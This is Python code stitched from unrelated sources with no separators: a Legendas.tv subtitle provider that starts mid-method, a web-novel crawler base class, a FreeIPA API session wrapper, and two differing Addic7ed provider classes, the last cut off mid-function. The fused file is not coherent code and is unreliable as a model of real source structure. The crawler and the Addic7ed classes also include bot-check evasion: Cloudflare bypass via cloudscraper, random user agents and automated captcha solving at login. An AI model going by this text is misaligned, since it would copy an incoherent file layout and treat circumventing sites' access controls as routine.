                    'Mismatched season %s, discarding title %d (%s)',
                    title.get('season'), title_id, sanitized_result)
                return
        # movie type
        else:
            # discard mismatches on type
            if title['type'] != 'movie':
                logger.debug(
                    "Mismatched 'movie' type, discarding title %d (%s)",
                    title_id, sanitized_result)
                return

            # discard mismatches on year
            if year is not None and 'year' in title and title['year'] != year:
                logger.debug(
                    "Mismatched movie year, discarding title %d (%s)",
                    title_id, sanitized_result)
                return
        return True

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME,
                               should_cache_fn=lambda value: value)
    def search_titles(self, title, season, title_year):
        """Search for titles matching the `title`.

        For episodes, each season has it own title

        :param str title: the title to search for.
        :param int season: season of the title
        :param int title_year: year of the title
        :return: found titles.
        :rtype: dict

        """
        titles = {}
        sanitized_titles = [sanitize(title)]
        ignore_characters = {'\'', '.'}
        if any(c in title for c in ignore_characters):
            sanitized_titles.append(
                sanitize(title, ignore_characters=ignore_characters))

        for sanitized_title in sanitized_titles:
            # make the query
            if season:
                logger.info('Searching episode title %r for season %r',
                            sanitized_title, season)
            else:
                logger.info('Searching movie title %r', sanitized_title)

            r = self.session.get(
                self.server_url +
                'legenda/sugestao/{}'.format(sanitized_title), timeout=10)
            raise_for_status(r)
            results = json.loads(r.text)

            # loop over results; use a local dict instead of rebinding the
            # `title` parameter
            for result in results:
                source = result['_source']

                # extract id
                title_id = int(source['id_filme'])

                # extract type
                candidate = {'type': type_map[source['tipo']]}

                # extract title, year and country
                name, year, country = title_re.match(
                    source['dsc_nome']).groups()
                candidate['title'] = name

                # extract imdb_id
                if source['id_imdb'] != '0':
                    if not source['id_imdb'].startswith('tt'):
                        candidate['imdb_id'] = \
                            'tt' + source['id_imdb'].zfill(7)
                    else:
                        candidate['imdb_id'] = source['id_imdb']

                # extract season
                if candidate['type'] == 'episode':
                    if source['temporada'] and source['temporada'].isdigit():
                        candidate['season'] = int(source['temporada'])
                    else:
                        match = season_re.search(source['dsc_nome_br'])
                        if match:
                            candidate['season'] = int(match.group('season'))
                        else:
                            logger.debug(
                                'No season detected for title %d (%s)',
                                title_id, name)

                # extract year
                if year:
                    candidate['year'] = int(year)
                elif source['dsc_data_lancamento'] and \
                        source['dsc_data_lancamento'].isdigit():
                    # year is based on season air date hence the adjustment
                    candidate['year'] = (
                        int(source['dsc_data_lancamento']) -
                        candidate.get('season', 1) + 1)

                # add title only if is valid
                # Check against title without ignored chars
                if self.is_valid_title(candidate, title_id,
                                       sanitized_titles[0], season,
                                       title_year):
                    titles[title_id] = candidate

            logger.debug('Found %d titles', len(titles))

        return titles

    @region.cache_on_arguments(
        expiration_time=timedelta(minutes=15).total_seconds())
    def get_archives(self, title_id, language_code, title_type, season,
                     episode):
        """Get the archive list from a given `title_id`, `language_code`,
        `title_type`, `season` and `episode`.

        :param int title_id: title id.
        :param int language_code: language code.
        :param str title_type: episode or movie
        :param int season: season
        :param int episode: episode
        :return: the archives.
        :rtype: list of :class:`LegendasTVArchive`

        """
        archives = []
        page = 0
        while True:
            # get the archive page; timeout added for consistency with the
            # provider's other requests
            url = self.server_url + \
                'legenda/busca/-/{language}/-/{page}/{title}'.format(
                    language=language_code, page=page, title=title_id)
            r = self.session.get(url, timeout=10)
            raise_for_status(r)

            # parse the results
            soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])
            for archive_soup in soup.select(
                    'div.list_element > article > div > div.f_left'):
                # create archive
                archive = LegendasTVArchive(
                    archive_soup.a['href'].split('/')[2],
                    archive_soup.a.text,
                    'pack' in archive_soup.parent['class'],
                    'destaque' in archive_soup.parent['class'],
                    self.server_url + archive_soup.a['href'][1:])

                # clean name of path separators and pack flags
                clean_name = archive.name.replace('/', '-')
                if archive.pack and clean_name.startswith('(p)'):
                    clean_name = clean_name[3:]

                # guess from name
                guess = guessit(clean_name, {'type': title_type})

                # episode
                if season and episode:
                    # discard mismatches on episode in non-pack archives
                    # Guessit may return int for single episode or list for
                    # multi-episode
                    # Check if archive name has multiple episodes releases on
                    # it
                    if not archive.pack and 'episode' in guess:
                        wanted_episode = set(episode) if isinstance(
                            episode, list) else {episode}
                        archive_episode = guess['episode'] if isinstance(
                            guess['episode'], list) else {guess['episode']}

                        if not wanted_episode.intersection(archive_episode):
                            logger.debug(
                                'Mismatched episode %s, discarding archive: '
                                '%s', guess['episode'], clean_name)
                            continue

                # extract text containing downloads, rating and timestamp
                data_text = archive_soup.find('p', class_='data').text

                # match downloads
                archive.downloads = int(
                    downloads_re.search(data_text).group('downloads'))

                # match rating
                match = rating_re.search(data_text)
                if match:
                    archive.rating = int(match.group('rating'))

                # match timestamp and validate it
                time_data = {
                    k: int(v) for k, v in
                    timestamp_re.search(data_text).groupdict().items()}
                archive.timestamp = pytz.timezone(
                    'America/Sao_Paulo').localize(datetime(**time_data))
                if archive.timestamp > datetime.utcnow().replace(
                        tzinfo=pytz.utc):
                    raise ProviderError('Archive timestamp is in the future')

                # add archive
                logger.info(
                    'Found archive for title %d and language %d at page %s: '
                    '%s', title_id, language_code, page, archive)
                archives.append(archive)

            # stop on last page
            if soup.find('a', attrs={'class': 'load_more'},
                         string='carregar mais') is None:
                break

            # increment page count
            page += 1

        logger.debug('Found %d archives', len(archives))

        return archives

    def download_archive(self, archive):
        """Download an archive's :attr:`~LegendasTVArchive.content`.

        :param archive: the archive to download
            :attr:`~LegendasTVArchive.content` of.
        :type archive: :class:`LegendasTVArchive`

        """
        logger.info('Downloading archive %s', archive.id)
        # timeout added for consistency with the provider's other requests
        r = self.session.get(
            self.server_url + 'downloadarquivo/{}'.format(archive.id),
            timeout=10)
        raise_for_status(r)

        # open the archive
        archive_stream = io.BytesIO(r.content)
        if is_rarfile(archive_stream):
            logger.debug('Identified rar archive')
            archive.content = RarFile(archive_stream)
        elif is_zipfile(archive_stream):
            logger.debug('Identified zip archive')
            archive.content = ZipFile(archive_stream)
        else:
            raise ValueError('Not a valid archive')

    def query(self, language, title, season=None, episode=None, year=None):
        """Query the provider for subtitles in `language`."""
        # search for titles
        titles = self.search_titles(title, season, year)

        subtitles = []
        # iterate over titles
        for title_id, t in titles.items():

            logger.info('Getting archives for title %d and language %d',
                        title_id, language.legendastv)
            archives = self.get_archives(title_id, language.legendastv,
                                         t['type'], season, episode)
            if not archives:
                logger.info('No archives found for title %d and language %d',
                            title_id, language.legendastv)

            # iterate over title's archives
            for a in archives:

                # compute an expiration time based on the archive timestamp
                expiration_time = (
                    datetime.utcnow().replace(tzinfo=pytz.utc) -
                    a.timestamp).total_seconds()

                # attempt to get the releases from the cache
                cache_key = releases_key.format(archive_id=a.id,
                                                archive_name=a.name)
                releases = region.get(cache_key,
                                      expiration_time=expiration_time)

                # the releases are not in cache or cache is expired
                if releases == NO_VALUE:
                    logger.info('Releases not found in cache')

                    # download archive
                    self.download_archive(a)

                    # extract the releases
                    releases = []
                    for name in a.content.namelist():
                        # discard the legendastv file
                        if name.startswith('Legendas.tv'):
                            continue

                        # discard hidden files
                        if os.path.split(name)[-1].startswith('.'):
                            continue

                        # discard non-subtitle files
                        if not name.lower().endswith(SUBTITLE_EXTENSIONS):
                            continue

                        releases.append(name)

                    # cache the releases
                    region.set(cache_key, releases)

                # iterate over releases
                for r in releases:
                    subtitle = self.subtitle_class(
                        language, t['type'], t['title'], t.get('year'),
                        t.get('imdb_id'), t.get('season'), a, r)
                    logger.debug('Found subtitle %r', subtitle)
                    subtitles.append(subtitle)

        return subtitles

    def list_subtitles(self, video, languages):
        """List subtitles for `video` restricted to `languages`."""
        season = episode = None
        if isinstance(video, Episode):
            titles = [video.series] + video.alternative_series
            season = video.season
            episode = video.episode
        else:
            titles = [video.title] + video.alternative_titles

        # try each title until one yields subtitles
        for title in titles:
            subtitles = [s for l in languages for s in
                         self.query(l, title, season=season, episode=episode,
                                    year=video.year)]
            if subtitles:
                return subtitles

        return []

    def download_subtitle(self, subtitle):
        """Download `subtitle` and set its content."""
        # download archive in case we previously hit the releases cache and
        # didn't download it
        if subtitle.archive.content is None:
            self.download_archive(subtitle.archive)

        # extract subtitle's content
        subtitle.content = fix_line_ending(
            subtitle.archive.content.read(subtitle.name))
class Crawler:
    '''Blueprint for creating new crawlers'''

    def __init__(self):
        self._destroyed = False
        self.executor = futures.ThreadPoolExecutor(max_workers=3)

        # Initialize cloudscraper; fall back to a plain requests Session
        # if cloudscraper cannot be set up.
        try:
            self.scraper = cloudscraper.create_scraper(browser={
                'platform': 'linux',
                'mobile': False
            })
        except Exception:
            logger.exception('Failed to initialize cloudscraper')
            self.scraper = Session()
        # end try

        # Must resolve these fields inside `read_novel_info`
        self.novel_title = 'N/A'
        self.novel_author = 'N/A'
        self.novel_cover = None
        self.is_rtl = False

        # Each item must contain these keys:
        # `id` - 1 based index of the volume
        # `title` - the volume title (can be ignored)
        self.volumes = []

        # Each item must contain these keys:
        # `id` - 1 based index of the chapter
        # `title` - the title name
        # `volume` - the volume id of this chapter
        # `volume_title` - the volume title (can be ignored)
        # `url` - the link where to download the chapter
        self.chapters = []

        # Other stuffs - not necessary to resolve from crawler instance.
        self.home_url = ''
        self.novel_url = ''
        self.last_visited_url = None
    # end def

    def destroy(self):
        '''Release all resources held by this crawler.'''
        self._destroyed = True
        self.volumes.clear()
        self.chapters.clear()
        self.scraper.close()
        self.executor.shutdown(False)
    # end def

    # ------------------------------------------------------------------------- #
    # Implement these methods
    # ------------------------------------------------------------------------- #

    @abstractmethod
    def initialize(self):
        pass
    # end def

    @abstractmethod
    def login(self, email, password):
        pass
    # end def

    @abstractmethod
    def logout(self):
        pass
    # end def

    @abstractmethod
    def search_novel(self, query):
        '''Gets a list of results matching the given query'''
        pass
    # end def

    @abstractmethod
    def read_novel_info(self):
        '''Get novel title, autor, cover etc'''
        pass
    # end def

    @abstractmethod
    def download_chapter_body(self, chapter):
        '''Download body of a single chapter and return as clean html format.'''
        pass
    # end def

    def get_chapter_index_of(self, url):
        '''Return the index of chapter by given url or 0'''
        url = (url or '').strip().strip('/')
        for chapter in self.chapters:
            if chapter['url'] == url:
                return chapter['id']
            # end if
        # end for
        return 0
    # end def

    # ------------------------------------------------------------------------- #
    # Helper methods to be used
    # ------------------------------------------------------------------------- #

    @property
    def headers(self):
        '''Copy of the current request headers.'''
        return self.scraper.headers.copy()
    # end def

    @property
    def cookies(self):
        '''Snapshot of the current session cookies as a plain dict.'''
        return {x.name: x.value for x in self.scraper.cookies}
    # end def

    def absolute_url(self, url, page_url=None):
        '''Resolve `url` against the crawler's home or the given page url.'''
        url = (url or '').strip()
        if not page_url:
            page_url = self.last_visited_url
        # end if
        if not url:
            return None
        elif url.startswith('//'):
            # protocol-relative url: borrow the scheme from home_url
            return self.home_url.split(':')[0] + ':' + url
        elif url.find('//') >= 0:
            return url
        elif url.startswith('/'):
            return self.home_url + url[1:]
        elif page_url:
            return page_url.strip('/') + '/' + url
        else:
            return self.home_url + url
        # end if
    # end def

    def is_relative_url(self, url):
        '''True if `url` lives under the novel's own host and path.'''
        page = urlparse(self.novel_url)
        url = urlparse(url)
        return (page.hostname == url.hostname
                and url.path.startswith(page.path))
    # end def

    def get_response(self, url, **kargs):
        '''GET `url` via the scraper session; raises on HTTP errors.'''
        if self._destroyed:
            return None
        # end if
        kargs = kargs or dict()
        # kargs['verify'] = kargs.get('verify', False)
        kargs['timeout'] = kargs.get('timeout', 150)  # in seconds
        self.last_visited_url = url.strip('/')
        response = self.scraper.get(url, **kargs)
        response.encoding = 'utf-8'
        # NOTE: the session tracks response cookies by itself. The previous
        # `self.cookies.update(...)` call only mutated the throwaway dict
        # built by the `cookies` property, so it was removed as dead code.
        response.raise_for_status()
        return response
    # end def

    def submit_form(self, url, data=None, multipart=False, headers=None):
        '''Submit a form using post request'''
        if self._destroyed:
            return None
        # end if
        # Use fresh containers per call: mutable default arguments would be
        # shared across calls (the old `headers={}` default was mutated below).
        data = data or {}
        headers = dict(headers or {})
        headers.update({
            'Content-Type': 'multipart/form-data' if multipart
            else 'application/x-www-form-urlencoded; charset=UTF-8',
        })
        response = self.scraper.post(url, data=data, headers=headers)
        response.encoding = 'utf-8'
        response.raise_for_status()
        return response
    # end def

    def get_soup(self, *args, **kwargs):
        '''GET a page and parse it into a BeautifulSoup document.'''
        parser = kwargs.pop('parser', None)
        response = self.get_response(*args, **kwargs)
        return self.make_soup(response, parser)
    # end def

    def make_soup(self, response, parser=None):
        '''Parse a response body into BeautifulSoup; requires a <body> tag.'''
        html = response.content.decode('utf-8', 'ignore')
        soup = BeautifulSoup(html, parser or 'lxml')
        if not soup.find('body'):
            raise ConnectionError('HTML document was not loaded properly')
        # end if
        return soup
    # end def

    def get_json(self, *args, **kargs):
        '''GET a url and decode the response as JSON.'''
        response = self.get_response(*args, **kargs)
        return response.json()
    # end def

    def download_cover(self, output_file):
        '''Download the novel cover image to `output_file`.'''
        response = self.get_response(self.novel_cover)
        with open(output_file, 'wb') as f:
            f.write(response.content)
        # end with
    # end def

    # ------------------------------------------------------------------------- #

    blacklist_patterns = [
        r'^[\W\D]*(volume|chapter)[\W\D]+\d+[\W\D]*$',
    ]
    bad_tags = [
        'noscript', 'script', 'iframe', 'form', 'hr', 'img', 'ins',
        'button', 'input', 'amp-auto-ads', 'pirate'
    ]
    block_tags = ['h3', 'div', 'p']

    def is_blacklisted(self, text):
        '''True if `text` is empty or matches a blacklist pattern.'''
        if len(text.strip()) == 0:
            return True
        # end if
        for pattern in self.blacklist_patterns:
            if re.search(pattern, text, re.IGNORECASE):
                return True
            # end if
        # end for
        return False
    # end def

    def clean_contents(self, div):
        '''Strip comments, bad/empty/blacklisted tags and attributes from `div`.'''
        if not div:
            return div
        # end if
        div.attrs = {}
        for tag in div.find_all(True):
            if isinstance(tag, Comment):
                tag.extract()  # Remove comments
            elif tag.name == 'br':
                next_tag = getattr(tag, 'next_sibling')
                if next_tag and getattr(next_tag, 'name') == 'br':
                    tag.extract()  # collapse consecutive <br>
                # end if
            elif tag.name in self.bad_tags:
                tag.extract()  # Remove bad tags
            elif not tag.text.strip():
                tag.extract()  # Remove empty tags
            elif self.is_blacklisted(tag.text):
                tag.extract()  # Remove blacklisted contents
            elif hasattr(tag, 'attrs'):
                tag.attrs = {}  # Remove attributes
            # end if
        # end for
        return div
    # end def

    def extract_contents(self, tag, level=0):
        '''Flatten `tag` into a list of text/html fragments, recursing into block tags.'''
        body = []
        if level == 0:
            self.clean_contents(tag)
        # end if
        for elem in tag.contents:
            if self.block_tags.count(elem.name):
                body += self.extract_contents(elem, level + 1)
                continue
            # end if
            text = ''
            if not elem.name:
                text = str(elem).strip()
            else:
                text = '<%s>%s</%s>'
                text = text % (elem.name, elem.text.strip(), elem.name)
            # end if
            if text:
                body.append(text)
            # end if
        # end for
        if level > 0:
            return body
        else:
            return [x for x in body if len(x.strip())]
        # end if
    # end def

    def cleanup_text(self, text):
        '''Remove CJK characters from `text`.'''
        return re.sub(
            u'[⺀-⺙⺛-⻳⼀-⿕々〇〡-〩〸-〺〻㐀-䶵一-鿃豈-鶴侮-頻並-龎]',
            '', str(text), flags=re.UNICODE)
class IPASession(object):
    """Context-manager wrapper around a FreeIPA HTTP API session.

    Opens a requests Session with the IPA headers; logs in on ``__enter__``
    (unless constructed with ``login=False``) and closes the session on
    ``__exit__``.
    """

    # Public API

    def __init__(self, username, password, login=True):
        self.username = username
        self.password = password
        # whether __enter__ should authenticate immediately
        self.login_on_enter = login
        self.session = Session()
        self.session.headers = dict(IPA_HEADERS)

    def __enter__(self):
        if self.login_on_enter:
            self._login()
        return self

    def __exit__(self, exc_type, exc_value, exc_traceback):
        self.session.close()

    def change_own_password(self, new_password):
        """
        Do not login first, just use an unauthenticated session for this one.

        >>> with IPASession(username, old_password, login=False) as session:
        ...     session.change_own_password(new_password)
        """
        return self._send_form(
            IPA_CHANGE_PASSWORD_URL,
            user=self.username,
            old_password=self.password,
            new_password=new_password
        )

    def get_user_info(self, username=None):
        """Return the IPA record for `username` (defaults to the session user)."""
        if username is None:
            username = self.username
        return self._json_rpc("user_show", username)["result"]["result"]

    def change_password_for_another_user(self, username, new_password):
        # The magick argument tells IPA this is an administrative reset.
        return self._json_rpc("passwd", username, new_password,
                              IPA_OTHER_USER_PASSWORD_MAGICK)

    def add_user_to_group(self, username, groupname):
        return self._json_rpc("group_add_member", groupname, user=[username])

    def remove_user_from_group(self, username, groupname):
        return self._json_rpc("group_remove_member", groupname, user=[username])

    def create_user(self, username, first_name, surname, password):
        return self._json_rpc("user_add", username, givenname=first_name,
                              sn=surname, userpassword=password)

    def create_group(self, group_name):
        """Create `group_name`; treat "already exists" as success (returns None)."""
        try:
            return self._json_rpc("group_add", group_name, description=group_name)
        except IPAError as e:
            try:
                error, = e.args
                code = error["code"]
            except (KeyError, IndexError):
                # ipa connectivity error or something else, bad
                raise e
            else:
                if code == IPA_GROUP_ADD_ERROR_ALREADY_EXISTS:
                    # group already exists
                    # we are under "ensure exists" semantics so this is kosher
                    return None
                else:
                    # some other error
                    raise e

    # Internal implementation

    def _login(self):
        return self._send_form(IPA_LOGIN_URL, user=self.username,
                               password=self.password)

    def _send_form(self, url, **payload):
        """POST `payload` as a form; raise IPAError on HTTP failure."""
        response = self.session.post(url, data=payload,
                                     verify=settings.KOMPASSI_IPA_CACERT_PATH)

        try:
            response.raise_for_status()
        except HTTPError as e:
            logger.exception("IPA login failed: %s", response.content)
            raise IPAError(e)

        return True

    def _json_rpc(self, method_name, *args, **kwargs):
        """Call a JSON-RPC method; raise IPAError on HTTP or RPC-level errors."""
        headers = {"Content-Type": "application/json", "Accept": "application/json"}
        payload = {"params": [args, kwargs], "method": method_name, "id": 0}

        response = self.session.post(
            IPA_JSONRPC_URL,
            data=json.dumps(payload),
            headers=headers,
            verify=settings.KOMPASSI_IPA_CACERT_PATH
        )

        try:
            response.raise_for_status()
        # FIX: was the Python-2-only `except requests.HTTPError, e:` form,
        # inconsistent with `_send_form` above and a SyntaxError on Python 3.
        except HTTPError as e:
            logger.exception("IPA JSON-RPC call failed: %s", response.content)
            raise IPAError(e)

        result = response.json()

        error = result.get("error", None)
        if error:
            raise IPAError(error)

        return result
class Addic7edProvider(_Addic7edProvider):
    """Patched Addic7ed provider: random user agents, captcha solving and
    cached-login re-use.

    FIX: all textual checks on responses now use ``r.text`` (str) instead of
    ``r.content`` (bytes on Python 3, where ``"..." in r.content`` raises
    TypeError) — matching the behaviour already used elsewhere in this file.
    """

    languages = {Language('por', 'BR')} | {Language(l) for l in [
        'ara', 'aze', 'ben', 'bos', 'bul', 'cat', 'ces', 'dan', 'deu', 'ell', 'eng', 'eus', 'fas', 'fin', 'fra',
        'glg', 'heb', 'hrv', 'hun', 'hye', 'ind', 'ita', 'jpn', 'kor', 'mkd', 'msa', 'nld', 'nor', 'pol', 'por',
        'ron', 'rus', 'slk', 'slv', 'spa', 'sqi', 'srp', 'swe', 'tha', 'tur', 'ukr', 'vie', 'zho'
    ]} | {Language.fromietf(l) for l in ["sr-Latn", "sr-Cyrl"]}

    USE_ADDICTED_RANDOM_AGENTS = False
    hearing_impaired_verifiable = True
    subtitle_class = Addic7edSubtitle
    server_url = 'https://www.addic7ed.com/'

    sanitize_characters = {'-', ':', '(', ')', '.', '/'}

    def __init__(self, username=None, password=None, use_random_agents=False):
        super(Addic7edProvider, self).__init__(username=username, password=password)
        self.USE_ADDICTED_RANDOM_AGENTS = use_random_agents

    def initialize(self):
        """Create the HTTP session and log in, re-using a cached login if valid."""
        self.session = Session()
        self.session.headers['User-Agent'] = 'Subliminal/%s' % subliminal.__short_version__

        from .utils import FIRST_THOUSAND_OR_SO_USER_AGENTS as AGENT_LIST
        logger.debug("Addic7ed: using random user agents")
        self.session.headers['User-Agent'] = AGENT_LIST[randint(0, len(AGENT_LIST) - 1)]
        self.session.headers['Referer'] = self.server_url

        # login
        if self.username and self.password:
            def check_verification(cache_region):
                # Probe a logged-in-only page; a 302 redirect means the cached
                # login has expired.
                rr = self.session.get(self.server_url + 'panel.php', allow_redirects=False, timeout=10,
                                      headers={"Referer": self.server_url})
                if rr.status_code == 302:
                    logger.info('Addic7ed: Login expired')
                    cache_region.delete("addic7ed_data")
                else:
                    logger.info('Addic7ed: Re-using old login')
                    self.logged_in = True
                    return True

            if load_verification("addic7ed", self.session, callback=check_verification):
                return

            logger.info('Addic7ed: Logging in')
            data = {'username': self.username, 'password': self.password, 'Submit': 'Log in', 'url': '',
                    'remember': 'true'}

            tries = 0
            while tries < 3:
                r = self.session.get(self.server_url + 'login.php', timeout=10,
                                     headers={"Referer": self.server_url})
                if "grecaptcha" in r.text:
                    logger.info('Addic7ed: Solving captcha. This might take a couple of minutes, but should only '
                                'happen once every so often')

                    # FIX: guard the regex — the old `.group(1)` on a missed
                    # match raised AttributeError before the site_key check.
                    match = re.search(r'grecaptcha.execute\(\'(.+?)\',', r.text)
                    site_key = match.group(1) if match else None
                    if not site_key:
                        logger.error("Addic7ed: Captcha site-key not found!")
                        return

                    pitcher = pitchers.get_pitcher()("Addic7ed", self.server_url + 'login.php', site_key,
                                                     user_agent=self.session.headers["User-Agent"],
                                                     cookies=self.session.cookies.get_dict(),
                                                     is_invisible=True)

                    result = pitcher.throw()
                    if not result:
                        raise Exception("Addic7ed: Couldn't solve captcha!")

                    data["recaptcha_response"] = result

                r = self.session.post(self.server_url + 'dologin.php', data, allow_redirects=False, timeout=10,
                                      headers={"Referer": self.server_url + "login.php"})

                if "relax, slow down" in r.text:
                    raise TooManyRequests(self.username)

                if r.status_code != 302:
                    if "User <b></b> doesn't exist" in r.text and tries <= 2:
                        logger.info("Addic7ed: Error, trying again. (%s/%s)", tries + 1, 3)
                        tries += 1
                        continue
                    raise AuthenticationError(self.username)
                break

            store_verification("addic7ed", self.session)

            logger.debug('Addic7ed: Logged in')
            self.logged_in = True

    def terminate(self):
        """Close the HTTP session."""
        self.session.close()

    def get_show_id(self, series, year=None, country_code=None):
        """Get the best matching show id for `series`, `year` and `country_code`.

        First search in the result of :meth:`_get_show_ids` and fallback on a search with
        :meth:`_search_show_id`.

        :param str series: series of the episode.
        :param year: year of the series, if any.
        :type year: int
        :param country_code: country code of the series, if any.
        :type country_code: str
        :return: the show id, if found.
        :rtype: int
        """
        series_sanitized = sanitize(series).lower()
        show_ids = self._get_show_ids()
        show_id = None

        # attempt with country
        if not show_id and country_code:
            logger.debug('Getting show id with country')
            show_id = show_ids.get('%s %s' % (series_sanitized, country_code.lower()))

        # attempt with year
        if not show_id and year:
            logger.debug('Getting show id with year')
            show_id = show_ids.get('%s %d' % (series_sanitized, year))

        # attempt clean
        if not show_id:
            logger.debug('Getting show id')
            show_id = show_ids.get(series_sanitized)

        # search as last resort
        # broken right now
        # if not show_id:
        #     logger.warning('Series %s not found in show ids', series)
        #     show_id = self._search_show_id(series)

        return show_id

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _get_show_ids(self):
        """Get the ``dict`` of show ids per series by querying the `shows.php` page.

        :return: show id per series, lower case and without quotes.
        :rtype: dict

        # patch: add punctuation cleaning
        """
        # get the show page
        logger.info('Getting show ids')
        r = self.session.get(self.server_url + 'shows.php', timeout=10)
        r.raise_for_status()

        # LXML parser seems to fail when parsing Addic7ed.com HTML markup.
        # Last known version to work properly is 3.6.4 (next version, 3.7.0, fails)
        # Assuming the site's markup is bad, and stripping it down to only contain what's needed.
        show_cells = re.findall(show_cells_re, r.content)
        if show_cells:
            soup = ParserBeautifulSoup(b''.join(show_cells), ['lxml', 'html.parser'])
        else:
            # If RegEx fails, fall back to original r.content and use 'html.parser'
            soup = ParserBeautifulSoup(r.content, ['html.parser'])

        # populate the show ids
        show_ids = {}
        for show in soup.select('td > h3 > a[href^="/show/"]'):
            show_clean = sanitize(show.text, default_characters=self.sanitize_characters)
            try:
                show_id = int(show['href'][6:])
            except ValueError:
                continue

            show_ids[show_clean] = show_id
            match = series_year_re.match(show_clean)
            if match and match.group(2) and match.group(1) not in show_ids:
                # year found, also add it without year
                show_ids[match.group(1)] = show_id

        soup.decompose()
        soup = None

        logger.debug('Found %d show ids', len(show_ids))

        return show_ids

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _search_show_id(self, series, year=None):
        """Search the show id from the `series` and `year`.

        :param str series: series of the episode.
        :param year: year of the series, if any.
        :type year: int
        :return: the show id, if found.
        :rtype: int
        """
        # addic7ed doesn't support search with quotes
        series = series.replace('\'', ' ')

        # build the params
        series_year = '%s %d' % (series, year) if year is not None else series
        params = {'search': series_year, 'Submit': 'Search'}

        # make the search
        logger.info('Searching show ids with %r', params)

        # currently addic7ed searches via srch.php from the front page, then a re-search is needed which calls
        # search.php
        for endpoint in ("srch.php", "search.php",):
            headers = None
            if endpoint == "search.php":
                headers = {
                    "referer": self.server_url + "srch.php"
                }
            r = self.session.get(self.server_url + endpoint, params=params, timeout=10, headers=headers)
            r.raise_for_status()

            if r.text and "Sorry, your search" not in r.text:
                break

            time.sleep(4)

        if r.status_code == 304:
            raise TooManyRequests()

        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])

        suggestion = None

        # get the suggestion
        try:
            suggestion = soup.select('span.titulo > a[href^="/show/"]')
            if not suggestion:
                logger.warning('Show id not found: no suggestion')
                return None

            if not sanitize(suggestion[0].i.text.replace('\'', ' '),
                            default_characters=self.sanitize_characters) == \
                    sanitize(series_year, default_characters=self.sanitize_characters):
                logger.warning('Show id not found: suggestion does not match')
                return None

            show_id = int(suggestion[0]['href'][6:])
            logger.debug('Found show id %d', show_id)

            return show_id
        finally:
            soup.decompose()
            soup = None

    def query(self, show_id, series, season, year=None, country=None):
        # patch: fix logging

        # get the page of the season of the show
        logger.info('Getting the page of show id %d, season %d', show_id, season)
        r = self.session.get(self.server_url + 'ajax_loadShow.php',
                             params={'show': show_id, 'season': season},
                             timeout=10,
                             headers={
                                 "referer": "%sshow/%s" % (self.server_url, show_id),
                                 "X-Requested-With": "XMLHttpRequest"
                             }
                             )

        r.raise_for_status()

        if r.status_code == 304:
            raise TooManyRequests()

        if not r.content:
            # Provider wrongful return a status of 304 Not Modified with an empty content
            # raise_for_status won't raise exception for that status code
            logger.error('No data returned from provider')
            return []

        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])

        # loop over subtitle rows
        subtitles = []
        for row in soup.select('tr.epeven'):
            cells = row('td')

            # ignore incomplete subtitles
            status = cells[5].text
            if status != 'Completed':
                logger.debug('Ignoring subtitle with status %s', status)
                continue

            # read the item
            language = Language.fromaddic7ed(cells[3].text)
            hearing_impaired = bool(cells[6].text)
            page_link = self.server_url + cells[2].a['href'][1:]
            season = int(cells[0].text)
            episode = int(cells[1].text)
            title = cells[2].text
            version = cells[4].text
            download_link = cells[9].a['href'][1:]

            subtitle = self.subtitle_class(language, hearing_impaired, page_link, series, season, episode, title,
                                           year, version, download_link)
            logger.debug('Found subtitle %r', subtitle)
            subtitles.append(subtitle)

        soup.decompose()
        soup = None

        return subtitles

    def download_subtitle(self, subtitle):
        # download the subtitle
        r = self.session.get(self.server_url + subtitle.download_link,
                             headers={'Referer': subtitle.page_link},
                             timeout=10)
        r.raise_for_status()

        if r.status_code == 304:
            raise TooManyRequests()

        if not r.content:
            # Provider wrongful return a status of 304 Not Modified with an empty content
            # raise_for_status won't raise exception for that status code
            logger.error('Unable to download subtitle. No data returned from provider')
            return

        # detect download limit exceeded
        if r.headers['Content-Type'] == 'text/html':
            raise DownloadLimitExceeded

        subtitle.content = fix_line_ending(r.content)
class Addic7edProvider(_Addic7edProvider):
    # Addic7ed provider variant: requires credentials, supports random user
    # agents, captcha solving with retries, IP-block detection and daily
    # re-fetching of the cached show-id table.
    languages = {Language('por', 'BR')} | {
        Language(l)
        for l in [
            'ara', 'aze', 'ben', 'bos', 'bul', 'cat', 'ces', 'dan', 'deu',
            'ell', 'eng', 'eus', 'fas', 'fin', 'fra', 'glg', 'heb', 'hrv',
            'hun', 'hye', 'ind', 'ita', 'jpn', 'kor', 'mkd', 'msa', 'nld',
            'nor', 'pol', 'por', 'ron', 'rus', 'slk', 'slv', 'spa', 'sqi',
            'srp', 'swe', 'tha', 'tur', 'ukr', 'vie', 'zho'
        ]
    } | {Language.fromietf(l) for l in ["sr-Latn", "sr-Cyrl"]}

    USE_ADDICTED_RANDOM_AGENTS = False
    hearing_impaired_verifiable = True
    subtitle_class = Addic7edSubtitle
    server_url = 'https://www.addic7ed.com/'

    sanitize_characters = {'-', ':', '(', ')', '.', '/'}
    # cache key storing the datetime of the last shows.php fetch
    last_show_ids_fetch_key = "addic7ed_last_id_fetch"

    def __init__(self, username=None, password=None, use_random_agents=False):
        """Store credentials; both username and password are mandatory."""
        super(Addic7edProvider, self).__init__(username=username,
                                               password=password)
        self.USE_ADDICTED_RANDOM_AGENTS = use_random_agents

        if not all((username, password)):
            raise ConfigurationError('Username and password must be specified')

    def initialize(self):
        """Create the HTTP session and log in, re-using a cached login if valid."""
        self.session = Session()
        self.session.headers[
            'User-Agent'] = 'Subliminal/%s' % subliminal.__short_version__

        from .utils import FIRST_THOUSAND_OR_SO_USER_AGENTS as AGENT_LIST
        logger.debug("Addic7ed: using random user agents")
        self.session.headers['User-Agent'] = AGENT_LIST[randint(
            0, len(AGENT_LIST) - 1)]
        self.session.headers['Referer'] = self.server_url

        # login
        if self.username and self.password:

            def check_verification(cache_region):
                # Probe a logged-in-only page; a 302 redirect means the cached
                # login has expired. Connection failures are treated as an IP
                # block (NOTE(review): presumably requests' ConnectionError /
                # ConnectTimeout — confirm against the file's imports).
                try:
                    rr = self.session.get(self.server_url + 'panel.php',
                                          allow_redirects=False,
                                          timeout=10,
                                          headers={"Referer": self.server_url})
                    if rr.status_code == 302:
                        logger.info('Addic7ed: Login expired')
